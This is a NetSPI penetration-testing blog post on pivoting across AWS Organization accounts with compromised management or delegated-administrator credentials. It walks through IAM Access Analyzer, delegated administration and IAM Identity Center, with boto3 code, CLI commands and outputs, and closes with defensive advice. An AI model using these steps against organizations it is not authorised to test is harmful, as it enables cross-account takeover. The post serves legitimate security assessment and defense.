IAM Access Analyzer reviews the roles in an AWS account and tells you if any role trust relationships reach outside a “trust zone.” For example, if you have a role in an AWS account that allows any other AWS account to assume it, that role would get flagged as violating the trust zone since “any AWS account” is a much larger scope than a single AWS account. 

When integrated with AWS Organizations, the Access Analyzer associated trust zone (and as a byproduct, scan range) expands to the entire organization. By giving IAM Access Analyzer trusted access in Account A, we can let the Analyzer scan each member account in the organization and return a report that would include Account B’s vulnerable role.

Before we begin, let’s review each account’s IAM roles. Note we only have access to Account A info, but both role lists are provided here for transparency. Account B has the role with the trusted entity of * that we want to both discover and exploit as Account A.

Figures 10: Account A & Account B Starting IAM Roles Before Exploitation

As the attacker in Account A, navigate to “Services” in AWS Organizations and observe that the IAM Access Analyzer is disabled by default. While we could use the UI controls to enable the organization-integrated feature, we could also make use of the AWS Command Line Interface (CLI) using the leaked credentials.
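
A boto3 equivalent of enabling trusted access for Access Analyzer and then standing up an organization-wide analyzer might look like the sketch below (the analyzer name and region are placeholders; the raw CLI versions of these calls are listed in the Appendix):

import boto3

# Compromised Account A (management) credentials assumed throughout
orgs = boto3.client("organizations")
orgs.enable_aws_service_access(ServicePrincipal="access-analyzer.amazonaws.com")

analyzer = boto3.client("accessanalyzer", region_name="us-east-1")
resp = analyzer.create_analyzer(
    analyzerName="TestAnalyzer",
    type="ORGANIZATION",  # zone of trust = the whole organization
)
print(resp["arn"])

# Findings take a few minutes to populate; poll this afterwards
for finding in analyzer.list_findings(analyzerArn=resp["arn"])["findings"]:
    print(finding["resource"], finding.get("principal"))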

Next, navigate to the IAM Access Analyzer feature within the IAM service and create an analyzer. Since Access Analyzer is now an enabled service, we can set the “Zone of trust” to the entire organization.

Figures 12: Creating an Access Analyzer

After a few minutes, refresh the page and observe that the overly trusting role from Account B is listed as an active finding, demonstrating an indirect avenue for collecting Account B data as an Account A entity.

Figure 13: Gathering Vulnerabilities in Account B as Account A

To complete the POC, observe how the attacker in Account A can take the knowledge from the vulnerability scan (specifically the role ARN), and assume the role in Account B thus pivoting within the general organization.

Figure 14: Using Account A to AssumeRole RoleToListS3Stuff in Account B

While not critical to know for the attacker steps listed above, we can review both accounts again and note that a new service-linked role, AWSServiceRoleForAccessAnalyzer, was created and used in each member account per the organization-integrated feature.

Figures 15: Account A & Account B IAM Roles After Exploitation

Leveraging IAM Access Analyzer Through Delegated Administration

To demonstrate delegated administrator exploitation regarding Access Analyzer, we need to enable delegated administration in our current organization environment. To do so from Account A, navigate to Account A’s Access Analyzer feature, choose to add a delegated administrator, and enter Account C’s account number.

Figure 16: Using Account A to Make Account C a Delegated Administrator
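
The same delegation can be performed with boto3 from Account A (Account C’s account number is a placeholder):

import boto3

# Placeholder value for illustration only
ACCOUNT_C_ID = "222222222222"

orgs = boto3.client("organizations")  # Account A (management) credentials
orgs.register_delegated_administrator(
    AccountId=ACCOUNT_C_ID,
    ServicePrincipal="access-analyzer.amazonaws.com",
)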

Assume that we have compromised credentials for Account C (as opposed to Account A). Also assume we have no starting knowledge regarding the organization. As Account C, we can navigate to the AWS Organizations service, and can conclude that we are probably a member account since the management account number does not match our compromised account number (under the Dashboard tab), and the general UI layout is not that of a management account.

However, unlike a default member account, the “AWS Accounts” tab now returns all AWS accounts in the organization instead of permission denied errors. Remember that one of the first things a delegated administrator gets is read-only rights to the organization. Thus, we can further hypothesize that we are not just a default member account, but a delegated administrator.

Figure 17: Viewing Organization Info as Account C

But delegated administrator for what? Since there is no centralized UI component in a member account that lists all the delegated services, we would need to browse to each organization-integrated feature in Account C (IAM Access Analyzer, S3 Storage Lens, etc.) where the UI will hopefully tell us if we are the delegated administrator for that feature.

This is very cumbersome, and we can leverage the CLI in the Appendix of this blog with our delegated administrator read-only rights to speed along the identification process as seen below. First, we call “list-delegated-administrators” to reconfirm our previous hypothesis that Account C is a delegated administrator. We can then list out all the delegated services in relation to ourselves by passing in our own account number to “list-delegated-services-for-account.” In this case, we can see that Access Analyzer is listed (access-analyzer.amazonaws.com) as the delegated service.

Figure 18: Listing Delegated Administrators & Delegated Services as Account C
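
The equivalent checks with boto3 from Account C’s session look roughly like this (our own account number comes back from STS, so nothing needs to be hardcoded):

import boto3

sts = boto3.client("sts")             # compromised Account C credentials
orgs = boto3.client("organizations")
my_account = sts.get_caller_identity()["Account"]

# Reconfirm that delegated administrators exist and that we are one of them
admins = orgs.list_delegated_administrators()["DelegatedAdministrators"]
print([a["Id"] for a in admins])

# Which organization-integrated services have been delegated to us specifically?
services = orgs.list_delegated_services_for_account(AccountId=my_account)
print([s["ServicePrincipal"] for s in services["DelegatedServices"]])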

From here, finding the overly trusting role in Account B plays out much the same way as the trusted access example. We create an analyzer in Account C (now having the option to choose the entire organization due to the delegated administrator status), wait for the results, and identify the overly trusting role in Account B. Note that during setup, my first analyzer did not pick up the role immediately so deleting the old analyzer and making a new one seems to be a good debugging step. 

Figure 19: Gathering Vulnerabilities in Account B as Account C

While the previous example started from the perspective of a compromised management account, delegated administration shows how a member account can still leverage organization-integrated features to access/analyze/change member accounts in the overall organization.

IAM Identity Center (Successor to SSO) – Complete Control/Movement over Member Account

IAM Identity Center can be thought of as another “easy win” where one can authenticate to any select member account allowing for full account takeover. While this does support delegated administration, we will just focus on trusted access. Once again, we will assume that you, as an attacker, have compromised credentials for Account A and are now in complete control of the management account.

Navigate to the IAM Identity Center service and choose to “Enable” it. This is the equivalent of enabling trusted access, and listing enabled services now returns IAM Identity Center as “sso.amazonaws.com”.

Figures 20: Enabling the IAM Identity Center Service

Glancing over IAM Identity Center, we can see AWS Organizations is embedded within the service under “AWS accounts”, and that we have the option to create users with associated permission sets. A user entity can be used to sign into the AWS access portal URL, and a permission set says what one can do in terms of IAM privileges. To get into any member account in AWS Organizations, we will create a user with a one-time password (OTP), create a permission set allowing access to all actions/resources, attach the user and permission set to target member account, and subsequently authenticate as the user to get access to the member account.

Figures 21: IAM Identity Center Dashboard

Create a user as shown below in Figure 22. Note we will choose the option to “generate a one-time password.” Instead of getting an OTP, we could also choose to send an email to create the user.

Figures 22: Creating a User Workflow

At the end of the user creation workflow, we are given an OTP and a Sign-In link. Note this access portal URL is the same URL displayed on the main dashboards page of IAM Identity Center.

Figure 23: Saving One-Time Password for New User

Next, create a permission set. Think of permission sets as wrappers for IAM policies. We can wrap items like AWS-managed/customer-managed/inline IAM policies in each permission set via the “Custom permission set” workflow. For simplicity’s sake, we will just choose a “Predefined permission set” that already includes the equivalent of the AdministratorAccess policy. While these permission sets encapsulate IAM policies, they are not the same entity and have their own ARN format.

Figures 24: Creating Permission Set Workflow

Now that we have our user and permission set, we can set up a user to log into any member account in our organization displayed in the “AWS accounts” item in the lefthand navigation bar.

Figures 25: Attaching a User/Permission Set to Account Workflow

Now that the user is assigned to the member account, navigate to the sign in URL from earlier and enter the username/OTP combination following the login prompts.

Figures 26: Authenticate as User Workflow

Observe that post-authentication returns a portal with links for accessing the member AWS account via the UI or direct credentials. Clicking on the UI option takes us into the AWS console for Account C. In the UI we can see we are the user with the AdministratorAccess permission set. Thus, we have turned our account takeover of one AWS account into two AWS accounts. We could also have done the exact same vector of attack for Account B allowing for a complete takeover of every AWS account in the organization.

Figures 27: Sign into Member Account as AdministratorAccess User

It is worth mentioning that one can configure the service to automatically email OTPs upon user creation via the CLI if that is desired to avoid UI interaction. However, the act of turning on this setting still requires access to the UI, making some UI interaction an apparent necessity. After setting up automated email OTPs, you can create the user and permission set via the CLI and immediately try to sign in via the sign-in URL with the username (not the user’s email). An email containing the OTP is then sent to the address associated with the username.

Figures 28: Alternative Sign In Technique

Defense

The scenarios above started with the prerequisite that the management or member account credentials had been compromised. Thus, the pivoting techniques listed above do not represent an inherent flaw in AWS itself, but represent potential vectors of attack if certain access is gained through leaked credentials, internal threats, etc. Users can perform several actions to help defend against attacker movement in their organizations including:

  • Adhering to a principle of least privilege at the IAM level. Ideally, users in the AWS environment should only have the permissions necessary to do their job. These granular controls mean that if an account were compromised, the attacker might not be able to pivot any further into the environment.
  • Adhering to a principle of least privilege at the service level. Ensure that organization-integrated features with trusted access or delegated administration are needed and used. Leaving organization-integrated features enabled when not needed introduces an unnecessary blast radius.
  • Protect credentials, especially those for management accounts and delegated administrators. As seen above, these two positions grant access potentially to an entire organization, so the AWS keys should be protected and maintained.
  • Ensure proper logging infrastructure is set up so Organization actions are properly documented and monitored.

The following AWS articles provide guidance pertaining to the points discussed above. Or connect with NetSPI to learn how an AWS penetration test can help you uncover areas of misconfiguration or weakness in your AWS environment.

Conclusion

This article covers conceptual knowledge and demonstrates actual mechanisms for pivoting within an AWS Organization. Note that the article only covered IAM Access Analyzer and IAM Identity Center, but there are many other organization-integrated features. 

If you are on an assessment without an easy AssumeRole into member accounts and see an enabled organization feature, it is highly encouraged to review that specific feature’s documentation for possible pivoting techniques.

In part two of this blog series, we will review one more organization-integrated feature, a recent Organizations service update, and a tool I have created and pushed to Pacu to assist in enumerating all that was discussed above in one command.

Appendix: CLI Commands

Below is a summary of the important CLI commands that were used or leveraged through the UI. I have also included two examples of CLI workflows for Access Analyzer and Identity Center referenced above. As mentioned, Identity Center involves a mix of UI-only functionality and CLI commands unless the OTP email setting is otherwise configured by default.

# Base Organization Read APIs

aws organizations describe-organization
aws organizations list-roots
aws organizations list-accounts
aws organizations list-aws-service-access-for-organization
aws organizations list-delegated-administrators
aws organizations list-delegated-services-for-account --account-id [account number]
aws organizations list-organizational-units-for-parent --parent-id [OU/root ID]

#  Base Organization Mutate APIs

aws organizations enable-aws-service-access --service-principal [principal designated URL]
aws organizations register-delegated-administrator --account-id [account number] --service-principal [principal designated URL]

# Create Analyzer

└─$ aws accessanalyzer create-analyzer --analyzer-name "TestAnalyzer" --type "ORGANIZATION" --profile Orchestrator --region us-east-1
{
    "arn": "arn:aws:access-analyzer:us-east-1: [REDACTED]0:analyzer/TestAnalyzer"
}

# List Access Analyzer Findings

└─$ aws accessanalyzer list-findings --analyzer-arn "arn:aws:access-analyzer:us-east-1: [REDACTED]0:analyzer/TestAnalyzer" --profile Orchestrator --region us-east-1
{
    "findings": [
        {
            "id": "da8a421c-8d7f-47d7-b9aa-58ea3df45a6c",
            "principal": {
                "AWS": "*"
            },
            "action": [
                "sts:AssumeRole"
            ],
            "resource": "arn:aws:iam:: [REDACTED]6:role/RoleToListS3Stuff",
            "isPublic": true,
            "resourceType": "AWS::IAM::Role",
            "condition": {},
            "createdAt": "2022-12-21T04:29:13.377000+00:00",
            "analyzedAt": "2022-12-21T04:29:13.377000+00:00",
            "updatedAt": "2022-12-21T04:29:13.377000+00:00",
            "status": "ACTIVE",
            "resourceOwnerAccount": "579735764396"
        }
    ]
}

# Get Specific Analyzer Finding

└─$ aws accessanalyzer get-finding --analyzer-arn "arn:aws:access-analyzer:us-east-1: [REDACTED]0:analyzer/TestAnalyzer" --id "da8a421c-8d7f-47d7-b9aa-58ea3df45a6c" --profile Orchestrator --region us-east-1
{
    "finding": {
        "id": "da8a421c-8d7f-47d7-b9aa-58ea3df45a6c",
        "principal": {
            "AWS": "*"
        },
        "action": [
            "sts:AssumeRole"
        ],
        "resource": "arn:aws:iam::[REDACTED]6:role/RoleToListS3Stuff",
        "isPublic": true,
        "resourceType": "AWS::IAM::Role",
        "condition": {},
        "createdAt": "2022-12-21T04:29:13.377000+00:00",
        "analyzedAt": "2022-12-21T04:29:13.377000+00:00",
        "updatedAt": "2022-12-21T04:29:13.377000+00:00",
        "status": "ACTIVE",
        "resourceOwnerAccount": "579735764396"
    }
}

# IAM Identity Center Example Workflow

# Get instance ID

└─$ aws sso-admin list-instances --profile Orchestrator --region us-west-2
{
    "Instances": [
        {
            "InstanceArn": "arn:aws:sso:::instance/ssoins-7907a1fb914efa94",
            "IdentityStoreId": "d-92676f572a"
        }
    ]
}

# Create user. Note password is not returned via CLI and one needs to either get it from the UI via “Reset Password” on the new user or have the OTP auto-email setting configured.

└─$ aws identitystore create-user --profile Orchestrator --region us-west-2 --identity-store-id "d-92676f572a" --name "Formatted=FormattedValue,GivenName=GivenNameValue,FamilyName=FamilyNameValue" --user-name "Username" --display-name "TEST" --emails "Value=[REDACTED]@gmail.com,Type=Work,Primary=True"
{
    "UserId": "d81153b0-9051-709f-f49e-b6d9ec91f892",
    "IdentityStoreId": "d-92676f572a"
}

# Create Permission Set

└─$ aws sso-admin create-permission-set --name "PermissionSetOne" --instance-arn "arn:aws:sso:::instance/ssoins-7907a1fb914efa94" --session-duration "PT12H" --profile Orchestrator --region us-west-2
{
    "PermissionSet": {
        "Name": "PermissionSetOne",
        "PermissionSetArn": "arn:aws:sso:::permissionSet/ssoins-7907a1fb914efa94/ps-a8a74ca5fd800994",
        "CreatedDate": "2022-12-18T19:51:37.664000-05:00",
        "SessionDuration": "PT12H"
    }
}
└─$ aws sso-admin attach-managed-policy-to-permission-set --instance-arn "arn:aws:sso:::instance/ssoins-7907a1fb914efa94" --permission-set-arn "arn:aws:sso:::permissionSet/ssoins-7907a1fb914efa94/ps-a8a74ca5fd800994" --managed-policy-arn "arn:aws:iam::aws:policy/AdministratorAccess" --profile Orchestrator --region us-west-2
{
    "PermissionSet": {
        "Name": "PermissionSetOne",
        "PermissionSetArn": "arn:aws:sso:::permissionSet/ssoins-7907a1fb914efa94/ps-a8a74ca5fd800994",
        "CreatedDate": "2022-12-18T19:51:37.664000-05:00",
        "SessionDuration": "PT12H"
    }
}

# Attach permission set and user to account. Check status of provision.

└─$ aws sso-admin create-account-assignment --instance-arn "arn:aws:sso:::instance/ssoins-7907a1fb914efa94" --target-id "[REDACTED]6" --target-type "AWS_ACCOUNT" --permission-set-arn "arn:aws:sso:::permissionSet/ssoins-7907a1fb914efa94/ps-a8a74ca5fd800994" --principal-type "USER" --principal-id "d81153b0-9051-709f-f49e-b6d9ec91f892" --profile Orchestrator --region us-west-2
{
    "AccountAssignmentCreationStatus": {
        "Status": "IN_PROGRESS",
        "RequestId": "c6f6afee-efd2-4cad-a52e-58d937184b52",
        "TargetId": "[REDACTED]6",
        "TargetType": "AWS_ACCOUNT",
        "PermissionSetArn": "arn:aws:sso:::permissionSet/ssoins-7907a1fb914efa94/ps-a8a74ca5fd800994",
        "PrincipalType": "USER",
        "PrincipalId": "d81153b0-9051-709f-f49e-b6d9ec91f892"
    }
}
└─$ aws sso-admin describe-account-assignment-creation-status --instance-arn "arn:aws:sso:::instance/ssoins-7907a1fb914efa94" --account-assignment-creation-request-id "c6f6afee-efd2-4cad-a52e-58d937184b52" --profile Orchestrator --region us-west-2
{
    "AccountAssignmentCreationStatus": {
        "Status": "SUCCEEDED",
        "RequestId": "c6f6afee-efd2-4cad-a52e-58d937184b52",
        "TargetId": "[REDACTED]6",
        "TargetType": "AWS_ACCOUNT",
        "PermissionSetArn": "arn:aws:sso:::permissionSet/ssoins-7907a1fb914efa94/ps-a8a74ca5fd800994",
        "PrincipalType": "USER",
        "PrincipalId": "d81153b0-9051-709f-f49e-b6d9ec91f892",
        "CreatedDate": "2022-12-18T19:57:22.335000-05:00"
    }
}

The post Pivoting Clouds in AWS Organizations – Part 1: Leveraging Account Creation, Trusted Access, and Delegated Admin appeared first on NetSPI.

]]>